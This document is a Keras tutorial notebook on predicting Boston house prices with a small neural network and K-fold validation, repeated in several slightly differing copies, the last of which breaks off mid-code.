Predicting house prices: a regression exampleThis notebook contains the code samples found in Chapter 3, Section 6 of [Deep Learning with Python](https://www.manning.com/books/deep-learning-with-python?a_aid=keras&a_bid=76564dff). Note that the original text features far more content, in particular further explanations and figures: in this notebook, you will only find source code and related comments.----In our two previous examples, we were considering classification problems, where the goal was to predict a single discrete label of an input data point. Another common type of machine learning problem is "regression", which consists of predicting a continuous value instead of a discrete label. For instance, predicting the temperature tomorrow, given meteorological data, or predicting the time that a software project will take to complete, given its specifications.Do not mix up "regression" with the algorithm "logistic regression": confusingly, "logistic regression" is not a regression algorithm, it is a classification algorithm. The Boston Housing Price datasetWe will be attempting to predict the median price of homes in a given Boston suburb in the mid-1970s, given a few data points about the suburb at the time, such as the crime rate, the local property tax rate, etc.The dataset we will be using has another interesting difference from our two previous examples: it has very few data points, only 506 in total, split between 404 training samples and 102 test samples, and each "feature" in the input data (e.g. the crime rate is a feature) has a different scale. For instance some values are proportions, which take a values between 0 and 1, others take values between 1 and 12, others between 0 and 100...Let's take a look at the data:
###Code
from tensorflow.keras.datasets import boston_housing
(train_data, train_targets), (test_data, test_targets) = boston_housing.load_data()
train_data.shape
test_data.shape
###Output
_____no_output_____
###Markdown
As you can see, we have 404 training samples and 102 test samples. The data comprises 13 features. The 13 features in the input data are as follow:1. Per capita crime rate.2. Proportion of residential land zoned for lots over 25,000 square feet.3. Proportion of non-retail business acres per town.4. Charles River dummy variable (= 1 if tract bounds river; 0 otherwise).5. Nitric oxides concentration (parts per 10 million).6. Average number of rooms per dwelling.7. Proportion of owner-occupied units built prior to 1940.8. Weighted distances to five Boston employment centres.9. Index of accessibility to radial highways.10. Full-value property-tax rate per $10,000.11. Pupil-teacher ratio by town.12. 1000 * (Bk - 0.63) ** 2 where Bk is the proportion of Black people by town.13. % lower status of the population.The targets are the median values of owner-occupied homes, in thousands of dollars:
###Code
train_targets
###Output
_____no_output_____
###Markdown
The prices are typically between \$10,000 and \$50,000. If that sounds cheap, remember this was the mid-1970s, and these prices are not inflation-adjusted. Preparing the dataIt would be problematic to feed into a neural network values that all take wildly different ranges. The network might be able to automatically adapt to such heterogeneous data, but it would definitely make learning more difficult. A widespread best practice to deal with such data is to do feature-wise normalization: for each feature in the input data (a column in the input data matrix), we will subtract the mean of the feature and divide by the standard deviation, so that the feature will be centered around 0 and will have a unit standard deviation. This is easily done in Numpy:
###Code
mean = train_data.mean(axis=0)
train_data -= mean
std = train_data.std(axis=0)
train_data /= std
test_data -= mean
test_data /= std
###Output
_____no_output_____
###Markdown
Note that the quantities that we use for normalizing the test data have been computed using the training data. We should never use in our workflow any quantity computed on the test data, even for something as simple as data normalization. Building our networkBecause so few samples are available, we will be using a very small network with two hidden layers, each with 64 units. In general, the less training data you have, the worse overfitting will be, and using a small network is one way to mitigate overfitting.
###Code
from tensorflow.keras import models
from tensorflow.keras import layers
def build_model():
# Because we will need to instantiate
# the same model multiple times,
# we use a function to construct it.
model = models.Sequential()
model.add(layers.Dense(64, activation='relu',
input_shape=(train_data.shape[1],)))
model.add(layers.Dense(64, activation='relu'))
model.add(layers.Dense(1))
model.compile(optimizer='rmsprop', loss='mse', metrics=['mae'])
return model
###Output
_____no_output_____
###Markdown
Regression 문제에서는 sigmoid와 같은 활성화함수를 사용하지않는다. Our network ends with a single unit, and no activation (i.e. it will be linear layer). This is a typical setup for scalar regression (i.e. regression where we are trying to predict a single continuous value). Applying an activation function would constrain the range that the output can take; for instance if we applied a `sigmoid` activation function to our last layer, the network could only learn to predict values between 0 and 1. Here, because the last layer is purely linear, the network is free to learn to predict values in any range.Note that we are compiling the network with the `mse` loss function -- Mean Squared Error, the square of the difference between the predictions and the targets, a widely used loss function for regression problems.We are also monitoring a new metric during training: `mae`. This stands for Mean Absolute Error. It is simply the absolute value of the difference between the predictions and the targets. For instance, a MAE of 0.5 on this problem would mean that our predictions are off by \$500 on average. Validating our approach using K-fold validationTo evaluate our network while we keep adjusting its parameters (such as the number of epochs used for training), we could simply split the data into a training set and a validation set, as we were doing in our previous examples. However, because we have so few data points, the validation set would end up being very small (e.g. about 100 examples). A consequence is that our validation scores may change a lot depending on _which_ data points we choose to use for validation and which we choose for training, i.e. the validation scores may have a high _variance_ with regard to the validation split. This would prevent us from reliably evaluating our model.The best practice in such situations is to use K-fold cross-validation. It consists of splitting the available data into K partitions (typically K=4 or 5), then instantiating K identical models, and training each one on K-1 partitions while evaluating on the remaining partition. The validation score for the model used would then be the average of the K validation scores obtained. In terms of code, this is straightforward: 데이터셋의 크기가 충분히 크지 않기 때문에 k-겹 겁증을해서 정확도를 높여보자.
###Code
import numpy as np
k = 4
num_val_samples = len(train_data) // k
num_epochs = 100
all_scores = []
for i in range(k):
print('processing fold #', i)
# Prepare the validation data: data from partition # k
val_data = train_data[i * num_val_samples: (i + 1) * num_val_samples]
val_targets = train_targets[i * num_val_samples: (i + 1) * num_val_samples]
# Prepare the training data: data from all other partitions
partial_train_data = np.concatenate(
[train_data[:i * num_val_samples],
train_data[(i + 1) * num_val_samples:]],
axis=0)
partial_train_targets = np.concatenate(
[train_targets[:i * num_val_samples],
train_targets[(i + 1) * num_val_samples:]],
axis=0)
# Build the Keras model (already compiled)
model = build_model()
# Train the model (in silent mode, verbose=0)
model.fit(partial_train_data, partial_train_targets,
epochs=num_epochs, batch_size=1, verbose=0)
# Evaluate the model on the validation data
val_mse, val_mae = model.evaluate(val_data, val_targets, verbose=0)
all_scores.append(val_mae)
all_scores
np.mean(all_scores)
###Output
_____no_output_____
###Markdown
As you can notice, the different runs do indeed show rather different validation scores, from 2.1 to 2.9. Their average (2.4) is a much more reliable metric than any single of these scores -- that's the entire point of K-fold cross-validation. In this case, we are off by \\$2,400 on average, which is still significant considering that the prices range from \\$10,000 to \\$50,000. Let's try training the network for a bit longer: 500 epochs. To keep a record of how well the model did at each epoch, we will modify our training loop to save the per-epoch validation score log:
###Code
from tensorflow.keras import backend as K
# Some memory clean-up
K.clear_session()
num_epochs = 500
all_mae_histories = []
for i in range(k):
print('processing fold #', i)
# Prepare the validation data: data from partition # k
val_data = train_data[i * num_val_samples: (i + 1) * num_val_samples]
val_targets = train_targets[i * num_val_samples: (i + 1) * num_val_samples]
# Prepare the training data: data from all other partitions
partial_train_data = np.concatenate(
[train_data[:i * num_val_samples],
train_data[(i + 1) * num_val_samples:]],
axis=0)
partial_train_targets = np.concatenate(
[train_targets[:i * num_val_samples],
train_targets[(i + 1) * num_val_samples:]],
axis=0)
# Build the Keras model (already compiled)
model = build_model()
# Train the model (in silent mode, verbose=0)
history = model.fit(partial_train_data, partial_train_targets,
validation_data=(val_data, val_targets),
epochs=num_epochs, batch_size=1, verbose=0)
mae_history = history.history['val_mae']
all_mae_histories.append(mae_history)
history.history.keys()
###Output
_____no_output_____
###Markdown
We can then compute the average of the per-epoch MAE scores for all folds:
###Code
average_mae_history = [
np.mean([x[i] for x in all_mae_histories]) for i in range(num_epochs)]
###Output
_____no_output_____
###Markdown
Let's plot this:
###Code
import matplotlib.pyplot as plt
plt.plot(range(1, len(average_mae_history) + 1), average_mae_history)
plt.xlabel('Epochs')
plt.ylabel('Validation MAE')
plt.show()
###Output
_____no_output_____
###Markdown
It may be a bit hard to see the plot due to scaling issues and relatively high variance. Let's:* Omit the first 10 data points, which are on a different scale from the rest of the curve.* Replace each point with an exponential moving average of the previous points, to obtain a smooth curve.
###Code
def smooth_curve(points, factor=0.9):
smoothed_points = []
for point in points:
if smoothed_points:
previous = smoothed_points[-1]
smoothed_points.append(previous * factor + point * (1 - factor))
else:
smoothed_points.append(point)
return smoothed_points
smooth_mae_history = smooth_curve(average_mae_history[10:])
plt.plot(range(1, len(smooth_mae_history) + 1), smooth_mae_history)
plt.xlabel('Epochs')
plt.ylabel('Validation MAE')
plt.show()
###Output
_____no_output_____
###Markdown
According to this plot, it seems that validation MAE stops improving significantly after 80 epochs. Past that point, we start overfitting.Once we are done tuning other parameters of our model (besides the number of epochs, we could also adjust the size of the hidden layers), we can train a final "production" model on all of the training data, with the best parameters, then look at its performance on the test data:
###Code
# Get a fresh, compiled model.
model = build_model()
# Train it on the entirety of the data.
model.fit(train_data, train_targets,
epochs=80, batch_size=16, verbose=0)
test_mse_score, test_mae_score = model.evaluate(test_data, test_targets)
test_mae_score
###Output
_____no_output_____
###Markdown
Predicting house prices: a regression exampleThis notebook contains the code samples found in Chapter 3, Section 6 of [Deep Learning with Python](https://www.manning.com/books/deep-learning-with-python?a_aid=keras&a_bid=76564dff). Note that the original text features far more content, in particular further explanations and figures: in this notebook, you will only find source code and related comments.----In our two previous examples, we were considering classification problems, where the goal was to predict a single discrete label of an input data point. Another common type of machine learning problem is "regression", which consists of predicting a continuous value instead of a discrete label. For instance, predicting the temperature tomorrow, given meteorological data, or predicting the time that a software project will take to complete, given its specifications.Do not mix up "regression" with the algorithm "logistic regression": confusingly, "logistic regression" is not a regression algorithm, it is a classification algorithm. The Boston Housing Price datasetWe will be attempting to predict the median price of homes in a given Boston suburb in the mid-1970s, given a few data points about the suburb at the time, such as the crime rate, the local property tax rate, etc.The dataset we will be using has another interesting difference from our two previous examples: it has very few data points, only 506 in total, split between 404 training samples and 102 test samples, and each "feature" in the input data (e.g. the crime rate is a feature) has a different scale. For instance some values are proportions, which take a values between 0 and 1, others take values between 1 and 12, others between 0 and 100...Let's take a look at the data:
###Code
from keras.datasets import boston_housing
(train_data, train_targets), (test_data, test_targets) = boston_housing.load_data()
train_data.shape
test_data.shape
###Output
_____no_output_____
###Markdown
As you can see, we have 404 training samples and 102 test samples. The data comprises 13 features. The 13 features in the input data are as follow:1. Per capita crime rate.2. Proportion of residential land zoned for lots over 25,000 square feet.3. Proportion of non-retail business acres per town.4. Charles River dummy variable (= 1 if tract bounds river; 0 otherwise).5. Nitric oxides concentration (parts per 10 million).6. Average number of rooms per dwelling.7. Proportion of owner-occupied units built prior to 1940.8. Weighted distances to five Boston employment centres.9. Index of accessibility to radial highways.10. Full-value property-tax rate per $10,000.11. Pupil-teacher ratio by town.12. 1000 * (Bk - 0.63) ** 2 where Bk is the proportion of Black people by town.13. % lower status of the population.The targets are the median values of owner-occupied homes, in thousands of dollars:
###Code
train_targets
###Output
_____no_output_____
###Markdown
The prices are typically between \$10,000 and \$50,000. If that sounds cheap, remember this was the mid-1970s, and these prices are not inflation-adjusted. Preparing the dataIt would be problematic to feed into a neural network values that all take wildly different ranges. The network might be able to automatically adapt to such heterogeneous data, but it would definitely make learning more difficult. A widespread best practice to deal with such data is to do feature-wise normalization: for each feature in the input data (a column in the input data matrix), we will subtract the mean of the feature and divide by the standard deviation, so that the feature will be centered around 0 and will have a unit standard deviation. This is easily done in Numpy:
###Code
mean = train_data.mean(axis=0)
train_data -= mean
std = train_data.std(axis=0)
train_data /= std
test_data -= mean
test_data /= std
###Output
_____no_output_____
###Markdown
Note that the quantities that we use for normalizing the test data have been computed using the training data. We should never use in our workflow any quantity computed on the test data, even for something as simple as data normalization. Building our networkBecause so few samples are available, we will be using a very small network with two hidden layers, each with 64 units. In general, the less training data you have, the worse overfitting will be, and using a small network is one way to mitigate overfitting.
###Code
from keras import models
from keras import layers
def build_model():
# Because we will need to instantiate
# the same model multiple times,
# we use a function to construct it.
model = models.Sequential()
model.add(layers.Dense(64, activation='relu',
input_shape=(train_data.shape[1],)))
model.add(layers.Dense(64, activation='relu'))
model.add(layers.Dense(1))
model.compile(optimizer='rmsprop', loss='mse', metrics=['mae'])
return model
###Output
_____no_output_____
###Markdown
Our network ends with a single unit, and no activation (i.e. it will be linear layer). This is a typical setup for scalar regression (i.e. regression where we are trying to predict a single continuous value). Applying an activation function would constrain the range that the output can take; for instance if we applied a `sigmoid` activation function to our last layer, the network could only learn to predict values between 0 and 1. Here, because the last layer is purely linear, the network is free to learn to predict values in any range.Note that we are compiling the network with the `mse` loss function -- Mean Squared Error, the square of the difference between the predictions and the targets, a widely used loss function for regression problems.We are also monitoring a new metric during training: `mae`. This stands for Mean Absolute Error. It is simply the absolute value of the difference between the predictions and the targets. For instance, a MAE of 0.5 on this problem would mean that our predictions are off by \$500 on average. Validating our approach using K-fold validationTo evaluate our network while we keep adjusting its parameters (such as the number of epochs used for training), we could simply split the data into a training set and a validation set, as we were doing in our previous examples. However, because we have so few data points, the validation set would end up being very small (e.g. about 100 examples). A consequence is that our validation scores may change a lot depending on _which_ data points we choose to use for validation and which we choose for training, i.e. the validation scores may have a high _variance_ with regard to the validation split. This would prevent us from reliably evaluating our model.The best practice in such situations is to use K-fold cross-validation. It consists of splitting the available data into K partitions (typically K=4 or 5), then instantiating K identical models, and training each one on K-1 partitions while evaluating on the remaining partition. The validation score for the model used would then be the average of the K validation scores obtained. In terms of code, this is straightforward:
###Code
import numpy as np
k = 4
num_val_samples = len(train_data) // k
num_epochs = 100
all_scores = []
for i in range(k):
print('processing fold #', i)
# Prepare the validation data: data from partition # k
val_data = train_data[i * num_val_samples: (i + 1) * num_val_samples]
val_targets = train_targets[i * num_val_samples: (i + 1) * num_val_samples]
# Prepare the training data: data from all other partitions
partial_train_data = np.concatenate(
[train_data[:i * num_val_samples],
train_data[(i + 1) * num_val_samples:]],
axis=0)
partial_train_targets = np.concatenate(
[train_targets[:i * num_val_samples],
train_targets[(i + 1) * num_val_samples:]],
axis=0)
# Build the Keras model (already compiled)
model = build_model()
# Train the model (in silent mode, verbose=0)
model.fit(partial_train_data, partial_train_targets,
epochs=num_epochs, batch_size=1, verbose=0)
# Evaluate the model on the validation data
val_mse, val_mae = model.evaluate(val_data, val_targets, verbose=0)
all_scores.append(val_mae)
all_scores
np.mean(all_scores)
###Output
_____no_output_____
###Markdown
As you can notice, the different runs do indeed show rather different validation scores, from 2.1 to 2.9. Their average (2.4) is a much more reliable metric than any single of these scores -- that's the entire point of K-fold cross-validation. In this case, we are off by \$2,400 on average, which is still significant considering that the prices range from \$10,000 to \$50,000. Let's try training the network for a bit longer: 500 epochs. To keep a record of how well the model did at each epoch, we will modify our training loop to save the per-epoch validation score log:
###Code
from keras import backend as K
# Some memory clean-up
K.clear_session()
num_epochs = 500
all_mae_histories = []
for i in range(k):
print('processing fold #', i)
# Prepare the validation data: data from partition # k
val_data = train_data[i * num_val_samples: (i + 1) * num_val_samples]
val_targets = train_targets[i * num_val_samples: (i + 1) * num_val_samples]
# Prepare the training data: data from all other partitions
partial_train_data = np.concatenate(
[train_data[:i * num_val_samples],
train_data[(i + 1) * num_val_samples:]],
axis=0)
partial_train_targets = np.concatenate(
[train_targets[:i * num_val_samples],
train_targets[(i + 1) * num_val_samples:]],
axis=0)
# Build the Keras model (already compiled)
model = build_model()
# Train the model (in silent mode, verbose=0)
history = model.fit(partial_train_data, partial_train_targets,
validation_data=(val_data, val_targets),
epochs=num_epochs, batch_size=1, verbose=0)
mae_history = history.history['val_mean_absolute_error']
all_mae_histories.append(mae_history)
###Output
processing fold # 0
processing fold # 1
processing fold # 2
processing fold # 3
###Markdown
We can then compute the average of the per-epoch MAE scores for all folds:
###Code
average_mae_history = [
np.mean([x[i] for x in all_mae_histories]) for i in range(num_epochs)]
###Output
_____no_output_____
###Markdown
Let's plot this:
###Code
import matplotlib.pyplot as plt
plt.plot(range(1, len(average_mae_history) + 1), average_mae_history)
plt.xlabel('Epochs')
plt.ylabel('Validation MAE')
plt.show()
###Output
_____no_output_____
###Markdown
It may be a bit hard to see the plot due to scaling issues and relatively high variance. Let's:* Omit the first 10 data points, which are on a different scale from the rest of the curve.* Replace each point with an exponential moving average of the previous points, to obtain a smooth curve.
###Code
def smooth_curve(points, factor=0.9):
smoothed_points = []
for point in points:
if smoothed_points:
previous = smoothed_points[-1]
smoothed_points.append(previous * factor + point * (1 - factor))
else:
smoothed_points.append(point)
return smoothed_points
smooth_mae_history = smooth_curve(average_mae_history[10:])
plt.plot(range(1, len(smooth_mae_history) + 1), smooth_mae_history)
plt.xlabel('Epochs')
plt.ylabel('Validation MAE')
plt.show()
###Output
_____no_output_____
###Markdown
According to this plot, it seems that validation MAE stops improving significantly after 80 epochs. Past that point, we start overfitting.Once we are done tuning other parameters of our model (besides the number of epochs, we could also adjust the size of the hidden layers), we can train a final "production" model on all of the training data, with the best parameters, then look at its performance on the test data:
###Code
# Get a fresh, compiled model.
model = build_model()
# Train it on the entirety of the data.
model.fit(train_data, train_targets,
epochs=80, batch_size=16, verbose=0)
test_mse_score, test_mae_score = model.evaluate(test_data, test_targets)
test_mae_score
###Output
_____no_output_____
###Markdown
Predicting house prices: a regression exampleThis notebook contains the code samples found in Chapter 3, Section 6 of [Deep Learning with Python](https://www.manning.com/books/deep-learning-with-python?a_aid=keras&a_bid=76564dff). Note that the original text features far more content, in particular further explanations and figures: in this notebook, you will only find source code and related comments.----In our two previous examples, we were considering classification problems, where the goal was to predict a single discrete label of an input data point. Another common type of machine learning problem is "regression", which consists of predicting a continuous value instead instead of a discrete label. For instance, predicting the temperature tomorrow, given meteorological data, or predicting the time that a software project will take to complete, given its specifications.Do not mix up "regression" with the algorithm "logistic regression": confusingly, "logistic regression" is not a regression algorithm, it is a classification algorithm. The Boston Housing Price datasetWe will be attempting to predict the median price of homes in a given Boston suburb in the mid-1970s, given a few data points about the suburb at the time, such as the crime rate, the local property tax rate, etc.The dataset we will be using has another interesting difference from our two previous examples: it has very few data points, only 506 in total, split between 404 training samples and 102 test samples, and each "feature" in the input data (e.g. the crime rate is a feature) has a different scale. For instance some values are proportions, which take a values between 0 and 1, others take values between 1 and 12, others between 0 and 100...Let's take a look at the data:
###Code
from keras.datasets import boston_housing
(train_data, train_targets), (test_data, test_targets) = boston_housing.load_data()
train_data.shape
test_data.shape
###Output
_____no_output_____
###Markdown
As you can see, we have 404 training samples and 102 test samples. The data comprises 13 features. The 13 features in the input data are as follow:1. Per capita crime rate.2. Proportion of residential land zoned for lots over 25,000 square feet.3. Proportion of non-retail business acres per town.4. Charles River dummy variable (= 1 if tract bounds river; 0 otherwise).5. Nitric oxides concentration (parts per 10 million).6. Average number of rooms per dwelling.7. Proportion of owner-occupied units built prior to 1940.8. Weighted distances to five Boston employment centres.9. Index of accessibility to radial highways.10. Full-value property-tax rate per $10,000.11. Pupil-teacher ratio by town.12. 1000 * (Bk - 0.63) ** 2 where Bk is the proportion of Black people by town.13. % lower status of the population.The targets are the median values of owner-occupied homes, in thousands of dollars:
###Code
train_targets
###Output
_____no_output_____
###Markdown
The prices are typically between \$10,000 and \$50,000. If that sounds cheap, remember this was the mid-1970s, and these prices are not inflation-adjusted. Preparing the dataIt would be problematic to feed into a neural network values that all take wildly different ranges. The network might be able to automatically adapt to such heterogeneous data, but it would definitely make learning more difficult. A widespread best practice to deal with such data is to do feature-wise normalization: for each feature in the input data (a column in the input data matrix), we will subtract the mean of the feature and divide by the standard deviation, so that the feature will be centered around 0 and will have a unit standard deviation. This is easily done in Numpy:
###Code
mean = train_data.mean(axis=0)
train_data -= mean
std = train_data.std(axis=0)
train_data /= std
test_data -= mean
test_data /= std
###Output
_____no_output_____
###Markdown
Note that the quantities that we use for normalizing the test data have been computed using the training data. We should never use in our workflow any quantity computed on the test data, even for something as simple as data normalization. Building our networkBecause so few samples are available, we will be using a very small network with two hidden layers, each with 64 units. In general, the less training data you have, the worse overfitting will be, and using a small network is one way to mitigate overfitting.
###Code
from keras import models
from keras import layers
def build_model():
# Because we will need to instantiate
# the same model multiple time,
# we use a function to construct it.
model = models.Sequential()
model.add(layers.Dense(64, activation='relu',
input_shape=(train_data.shape[1],)))
model.add(layers.Dense(64, activation='relu'))
model.add(layers.Dense(1))
model.compile(optimizer='rmsprop', loss='mse', metrics=['mae'])
return model
###Output
_____no_output_____
###Markdown
Our network ends with a single unit, and no activation (i.e. it will be linear layer). This is a typical setup for scalar regression (i.e. regression where we are trying to predict a single continuous value). Applying an activation function would constrain the range that the output can take; for instance if we applied a `sigmoid` activation function to our last layer, the network could only learn to predict values between 0 and 1. Here, because the last layer is purely linear, the network is free to learn to predict values in any range.Note that we are compiling the network with the `mse` loss function -- Mean Squared Error, the square of the different between the predictions and the targets, a widely used loss function for regression problems.We are also monitoring a new metric during training: `mae`. This stands for Mean Absolute Error. It is simply the absolute value of the difference between the predictions and the targets. For instance, a MAE of 0.5 on this problem would mean that our predictions are off by \$500 on average. Validating our approach using K-fold validationTo evaluate our network while we keep adjusting its parameters (such as the number of epochs used for training), we could simply split the data into a training set and a validation set, as we were doing in our previous examples. However, because we have so few data points, the validation set would end up being very small (e.g. about 100 examples). A consequence is that our validation scores may change a lot depending on _which_ data points we choose to use for validation and which we choose for training, i.e. the validation scores may have a high _variance_ with regard to the validation split. This would prevent us from reliably evaluating our model.The best practice in such situations is to use K-fold cross-validation. It consists of splitting the available data into K partitions (typically K=4 or 5), then instantiating K identical models, and training each one on K-1 partitions while evaluating on the remaining partition. The validation score for the model used would then be the average of the K validation scores obtained. In terms of code, this is straightforward:
###Code
import numpy as np
k = 4
num_val_samples = len(train_data) // k
num_epochs = 100
all_scores = []
for i in range(k):
print('processing fold #', i)
# Prepare the validation data: data from partition # k
val_data = train_data[i * num_val_samples: (i + 1) * num_val_samples]
val_targets = train_targets[i * num_val_samples: (i + 1) * num_val_samples]
# Prepare the training data: data from all other partitions
partial_train_data = np.concatenate(
[train_data[:i * num_val_samples],
train_data[(i + 1) * num_val_samples:]],
axis=0)
partial_train_targets = np.concatenate(
[train_targets[:i * num_val_samples],
train_targets[(i + 1) * num_val_samples:]],
axis=0)
# Build the Keras model (already compiled)
model = build_model()
# Train the model (in silent mode, verbose=0)
model.fit(partial_train_data, partial_train_targets,
epochs=num_epochs, batch_size=1, verbose=0)
# Evaluate the model on the validation data
val_mse, val_mae = model.evaluate(val_data, val_targets, verbose=0)
all_scores.append(val_mae)
all_scores
np.mean(all_scores)
###Output
_____no_output_____
###Markdown
As you can notice, the different runs do indeed show rather different validation scores, from 2.1 to 2.29. Their average (2.4) is a much more reliable metric than any single of these scores -- that's the entire point of K-fold cross-validation. In this case, we are off by \$2,400 on average, which is still significant considering that the prices range from \$10,000 to \$50,000. Let's try training the network for a bit longer: 500 epochs. To keep a record of how well the model did at each epoch, we will modify our training loop to save the per-epoch validation score log:
###Code
from keras import backend as K
# Some memory clean-up
K.clear_session()
num_epochs = 500
all_mae_histories = []
for i in range(k):
print('processing fold #', i)
# Prepare the validation data: data from partition # k
val_data = train_data[i * num_val_samples: (i + 1) * num_val_samples]
val_targets = train_targets[i * num_val_samples: (i + 1) * num_val_samples]
# Prepare the training data: data from all other partitions
partial_train_data = np.concatenate(
[train_data[:i * num_val_samples],
train_data[(i + 1) * num_val_samples:]],
axis=0)
partial_train_targets = np.concatenate(
[train_targets[:i * num_val_samples],
train_targets[(i + 1) * num_val_samples:]],
axis=0)
# Build the Keras model (already compiled)
model = build_model()
# Train the model (in silent mode, verbose=0)
history = model.fit(partial_train_data, partial_train_targets,
validation_data=(val_data, val_targets),
epochs=num_epochs, batch_size=1, verbose=0)
mae_history = history.history['val_mean_absolute_error']
all_mae_histories.append(mae_history)
###Output
processing fold # 0
processing fold # 1
processing fold # 2
processing fold # 3
###Markdown
We can then compute the average of the per-epoch MAE scores for all folds:
###Code
average_mae_history = [
np.mean([x[i] for x in all_mae_histories]) for i in range(num_epochs)]
###Output
_____no_output_____
###Markdown
Let's plot this:
###Code
import matplotlib.pyplot as plt
plt.plot(range(1, len(average_mae_history) + 1), average_mae_history)
plt.xlabel('Epochs')
plt.ylabel('Validation MAE')
plt.show()
###Output
_____no_output_____
###Markdown
It may be a bit hard to see the plot due to scaling issues and relatively high variance. Let's:* Omit the first 10 data points, which are on a different scale from the rest of the curve.* Replace each point with an exponential moving average of the previous points, to obtain a smooth curve.
###Code
def smooth_curve(points, factor=0.9):
smoothed_points = []
for point in points:
if smoothed_points:
previous = smoothed_points[-1]
smoothed_points.append(previous * factor + point * (1 - factor))
else:
smoothed_points.append(point)
return smoothed_points
smooth_mae_history = smooth_curve(average_mae_history[10:])
plt.plot(range(1, len(smooth_mae_history) + 1), smooth_mae_history)
plt.xlabel('Epochs')
plt.ylabel('Validation MAE')
plt.show()
###Output
_____no_output_____
###Markdown
According to this plot, it seems that validation MAE stops improving significantly after after 80 epochs. Past that point, we start overfitting.Once we are done tuning other parameters of our model (besides the number of epochs, we could also adjust the size of the hidden layers), we can train a final "production" model on all of the training data, with the best parameters, then look at its performance on the test data:
###Code
# Get a fresh, compiled model.
model = build_model()
# Train it on the entirety of the data.
model.fit(train_data, train_targets,
epochs=80, batch_size=16, verbose=0)
test_mse_score, test_mae_score = model.evaluate(test_data, test_targets)
test_mae_score
###Output
_____no_output_____
###Markdown
Predicting house prices: a regression exampleThis notebook contains the code samples found in Chapter 3, Section 6 of [Deep Learning with Python](https://www.manning.com/books/deep-learning-with-python?a_aid=keras&a_bid=76564dff). Note that the original text features far more content, in particular further explanations and figures: in this notebook, you will only find source code and related comments.----In our two previous examples, we were considering classification problems, where the goal was to predict a single discrete label of an input data point. Another common type of machine learning problem is "regression", which consists of predicting a continuous value instead of a discrete label. For instance, predicting the temperature tomorrow, given meteorological data, or predicting the time that a software project will take to complete, given its specifications.Do not mix up "regression" with the algorithm "logistic regression": confusingly, "logistic regression" is not a regression algorithm, it is a classification algorithm. The Boston Housing Price datasetWe will be attempting to predict the median price of homes in a given Boston suburb in the mid-1970s, given a few data points about the suburb at the time, such as the crime rate, the local property tax rate, etc.The dataset we will be using has another interesting difference from our two previous examples: it has very few data points, only 506 in total, split between 404 training samples and 102 test samples, and each "feature" in the input data (e.g. the crime rate is a feature) has a different scale. For instance some values are proportions, which take a values between 0 and 1, others take values between 1 and 12, others between 0 and 100...Let's take a look at the data:
###Code
from keras.datasets import boston_housing
(train_data, train_targets), (test_data, test_targets) = boston_housing.load_data()
train_data.shape
test_data.shape
###Output
_____no_output_____
###Markdown
As you can see, we have 404 training samples and 102 test samples. The data comprises 13 features. The 13 features in the input data are as follow:1. Per capita crime rate.2. Proportion of residential land zoned for lots over 25,000 square feet.3. Proportion of non-retail business acres per town.4. Charles River dummy variable (= 1 if tract bounds river; 0 otherwise).5. Nitric oxides concentration (parts per 10 million).6. Average number of rooms per dwelling.7. Proportion of owner-occupied units built prior to 1940.8. Weighted distances to five Boston employment centres.9. Index of accessibility to radial highways.10. Full-value property-tax rate per $10,000.11. Pupil-teacher ratio by town.12. 1000 * (Bk - 0.63) ** 2 where Bk is the proportion of Black people by town.13. % lower status of the population.The targets are the median values of owner-occupied homes, in thousands of dollars:
###Code
train_targets
###Output
_____no_output_____
###Markdown
The prices are typically between \$10,000 and \$50,000. If that sounds cheap, remember this was the mid-1970s, and these prices are not inflation-adjusted. Preparing the dataIt would be problematic to feed into a neural network values that all take wildly different ranges. The network might be able to automatically adapt to such heterogeneous data, but it would definitely make learning more difficult. A widespread best practice to deal with such data is to do feature-wise normalization: for each feature in the input data (a column in the input data matrix), we will subtract the mean of the feature and divide by the standard deviation, so that the feature will be centered around 0 and will have a unit standard deviation. This is easily done in Numpy:
###Code
mean = train_data.mean(axis=0)
train_data -= mean
std = train_data.std(axis=0)
train_data /= std
test_data -= mean
test_data /= std
###Output
_____no_output_____
###Markdown
Note that the quantities that we use for normalizing the test data have been computed using the training data. We should never use in our workflow any quantity computed on the test data, even for something as simple as data normalization. Building our networkBecause so few samples are available, we will be using a very small network with two hidden layers, each with 64 units. In general, the less training data you have, the worse overfitting will be, and using a small network is one way to mitigate overfitting.
###Code
from keras import models
from keras import layers
def build_model():
# Because we will need to instantiate
# the same model multiple times,
# we use a function to construct it.
model = models.Sequential()
model.add(layers.Dense(64, activation='relu',
input_shape=(train_data.shape[1],)))
model.add(layers.Dense(64, activation='relu'))
model.add(layers.Dense(1))
model.compile(optimizer='rmsprop', loss='mse', metrics=['mae'])
return model
###Output
_____no_output_____
###Markdown
Our network ends with a single unit, and no activation (i.e. it will be linear layer). This is a typical setup for scalar regression (i.e. regression where we are trying to predict a single continuous value). Applying an activation function would constrain the range that the output can take; for instance if we applied a `sigmoid` activation function to our last layer, the network could only learn to predict values between 0 and 1. Here, because the last layer is purely linear, the network is free to learn to predict values in any range.Note that we are compiling the network with the `mse` loss function -- Mean Squared Error, the square of the difference between the predictions and the targets, a widely used loss function for regression problems.We are also monitoring a new metric during training: `mae`. This stands for Mean Absolute Error. It is simply the absolute value of the difference between the predictions and the targets. For instance, a MAE of 0.5 on this problem would mean that our predictions are off by \$500 on average. Validating our approach using K-fold validationTo evaluate our network while we keep adjusting its parameters (such as the number of epochs used for training), we could simply split the data into a training set and a validation set, as we were doing in our previous examples. However, because we have so few data points, the validation set would end up being very small (e.g. about 100 examples). A consequence is that our validation scores may change a lot depending on _which_ data points we choose to use for validation and which we choose for training, i.e. the validation scores may have a high _variance_ with regard to the validation split. This would prevent us from reliably evaluating our model.The best practice in such situations is to use K-fold cross-validation. It consists of splitting the available data into K partitions (typically K=4 or 5), then instantiating K identical models, and training each one on K-1 partitions while evaluating on the remaining partition. The validation score for the model used would then be the average of the K validation scores obtained. In terms of code, this is straightforward:
###Code
import numpy as np
k = 4
num_val_samples = len(train_data) // k
num_epochs = 100
all_scores = []
for i in range(k):
print('processing fold #', i)
# Prepare the validation data: data from partition # k
val_data = train_data[i * num_val_samples: (i + 1) * num_val_samples]
val_targets = train_targets[i * num_val_samples: (i + 1) * num_val_samples]
# Prepare the training data: data from all other partitions
partial_train_data = np.concatenate(
[train_data[:i * num_val_samples],
train_data[(i + 1) * num_val_samples:]],
axis=0)
partial_train_targets = np.concatenate(
[train_targets[:i * num_val_samples],
train_targets[(i + 1) * num_val_samples:]],
axis=0)
# Build the Keras model (already compiled)
model = build_model()
# Train the model (in silent mode, verbose=0)
model.fit(partial_train_data, partial_train_targets,
epochs=num_epochs, batch_size=1, verbose=0)
# Evaluate the model on the validation data
